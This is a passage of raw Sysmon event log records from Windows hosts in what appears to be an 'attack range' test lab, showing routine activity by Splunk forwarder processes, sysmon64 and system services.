Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218016Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:45.381{4F8D34B0-1365-6216-9204-000000003902}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000218015Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:45.161{4F8D34B0-1364-6216-9104-000000003902}29363500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000293534Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:44.737{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53811-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293533Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:46.312{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DE57E5D90EFC1F3A537EE4A8A1672BB,SHA256=C5CAFA9BBB473DC343AE1E006F65AE1DF11DF9E738C1639E63377A18A27A36C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218032Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:46.176{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218031Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:46.051{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=996B444970BC7251B6352E5A6D018AB8,SHA256=F4648CAE71435A3F8A4C9DCD2E29EAA7DAB9BC285EF69EFBB2809087904C5279,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218030Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:46.051{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8A2692EE63D4F9C4C94B20D7CDE9697D,SHA256=C16275A7155D3CC8E202141D32469429202C961C8F7C765DBE73BED3C7266963,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218029Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:46.036{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1C9E4B7275C3EE1CFE7578C970CAEA5,SHA256=D4EF471659012AD2767B80DB18076870762A46AB3F1CC73162B7531FA7EE0B10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293535Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:47.327{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA3F22700619E7CE1838FDE57FABDCF8,SHA256=3115D0E9C4AB3DC1351F0855672611693D634A372BEA6627F12408AEEDC0A21F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218062Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.880{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1367-6216-9404-000000003902}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218061Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218060Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218059Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218058Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218057Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218056Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218055Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218054Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218053Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218052Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.880{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1367-6216-9404-000000003902}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218051Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.880{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1367-6216-9404-000000003902}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218050Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.880{4F8D34B0-1367-6216-9404-000000003902}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000218049Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:45.609{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51435-false10.0.1.12-8089- 354300x8000000000000000218048Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:44.580{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51434-false10.0.1.12-8000- 10341000x8000000000000000218047Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.411{4F8D34B0-1367-6216-9304-000000003902}2700920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218046Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.208{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1367-6216-9304-000000003902}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218045Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218044Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218043Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218042Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218041Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\